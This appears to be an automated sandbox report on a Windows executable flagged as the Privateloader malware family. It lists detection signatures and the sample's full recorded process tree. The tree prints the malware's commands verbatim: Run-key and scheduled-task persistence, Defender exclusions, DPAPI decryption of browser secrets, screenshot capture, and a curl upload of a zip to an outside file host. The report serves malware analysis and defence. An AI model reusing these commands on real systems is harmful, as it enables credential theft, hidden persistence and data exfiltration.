Analysis Overview
SHA256
6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
Threat Level: Known bad
The file 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe was found to be: Known bad.
Malicious Activity Summary
Privateloader family
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Looks up external IP address via web service
Adds Run key to start application
An obfuscated cmd.exe command-line is typically used to evade detection.
Unsigned PE
Enumerates physical storage devices
Modifies registry key
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Detects videocard installed
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-10 01:29
Signatures
Privateloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 01:29
Reported
2024-05-10 01:32
Platform
win7-20240419-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-10 01:29
Reported
2024-05-10 01:32
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
153s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\eCwyacTBVIkSrfh.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe" | C:\Windows\system32\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flpgohrl\flpgohrl.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A93.tmp" "c:\Users\Admin\AppData\Local\Temp\flpgohrl\CSCC6924A71820440CDA722ADBB1F6D8DF8.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,21,132,39,125,251,197,112,255,33,153,107,47,121,214,234,135,34,33,42,99,143,61,94,66,143,145,162,28,26,139,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,164,114,54,58,32,21,27,189,140,220,175,0,249,237,6,55,173,49,111,135,73,189,159,245,154,186,138,144,110,241,215,48,0,0,0,212,14,55,96,166,185,109,171,187,66,86,245,183,43,7,69,45,40,4,250,238,162,185,42,111,64,105,180,41,243,42,27,52,205,79,189,55,83,24,110,217,21,95,67,82,26,76,133,64,0,0,0,35,67,78,122,80,186,145,63,221,230,112,6,94,81,38,203,245,83,64,246,38,188,82,0,224,153,13,45,209,126,179,93,223,195,224,235,15,7,184,251,215,218,125,26,55,249,139,176,175,193,111,171,254,197,23,58,90,183,203,222,120,170,86,169), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,21,132,39,125,251,197,112,255,33,153,107,47,121,214,234,135,34,33,42,99,143,61,94,66,143,145,162,28,26,139,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,164,114,54,58,32,21,27,189,140,220,175,0,249,237,6,55,173,49,111,135,73,189,159,245,154,186,138,144,110,241,215,48,0,0,0,212,14,55,96,166,185,109,171,187,66,86,245,183,43,7,69,45,40,4,250,238,162,185,42,111,64,105,180,41,243,42,27,52,205,79,189,55,83,24,110,217,21,95,67,82,26,76,133,64,0,0,0,35,67,78,122,80,186,145,63,221,230,112,6,94,81,38,203,245,83,64,246,38,188,82,0,224,153,13,45,209,126,179,93,223,195,224,235,15,7,184,251,215,218,125,26,55,249,139,176,175,193,111,171,254,197,23,58,90,183,203,222,120,170,86,169), $null, 'CurrentUser')
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,172,10,216,232,15,37,158,119,88,250,148,87,92,51,72,72,36,95,145,150,227,23,216,4,42,221,50,75,178,104,36,160,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,132,236,218,13,85,102,89,234,54,186,13,51,235,48,156,152,89,252,191,243,203,88,117,230,86,55,201,234,128,220,87,48,0,0,0,34,11,113,88,165,221,250,230,124,28,211,23,203,89,232,67,100,137,156,72,121,28,89,53,208,73,104,239,179,119,239,68,155,192,154,153,18,41,9,68,14,187,224,156,4,131,86,10,64,0,0,0,172,142,22,215,99,2,196,120,174,131,146,150,221,167,186,6,253,30,9,17,114,205,220,151,0,2,223,18,17,149,205,118,107,177,26,91,44,211,135,10,201,31,241,216,214,213,113,253,129,206,58,164,242,150,9,187,51,47,163,44,103,192,53,154), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,172,10,216,232,15,37,158,119,88,250,148,87,92,51,72,72,36,95,145,150,227,23,216,4,42,221,50,75,178,104,36,160,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,132,236,218,13,85,102,89,234,54,186,13,51,235,48,156,152,89,252,191,243,203,88,117,230,86,55,201,234,128,220,87,48,0,0,0,34,11,113,88,165,221,250,230,124,28,211,23,203,89,232,67,100,137,156,72,121,28,89,53,208,73,104,239,179,119,239,68,155,192,154,153,18,41,9,68,14,187,224,156,4,131,86,10,64,0,0,0,172,142,22,215,99,2,196,120,174,131,146,150,221,167,186,6,253,30,9,17,114,205,220,151,0,2,223,18,17,149,205,118,107,177,26,91,44,211,135,10,201,31,241,216,214,213,113,253,129,206,58,164,242,150,9,187,51,47,163,44,103,192,53,154), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krkmaasn\krkmaasn.cmdline"
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6234.tmp" "c:\Users\Admin\AppData\Local\Temp\krkmaasn\CSC44B74D884DAD4622A95BCBBE83DD942.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe" /f
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Objiyuie.zip";"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Objiyuie.zip";
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
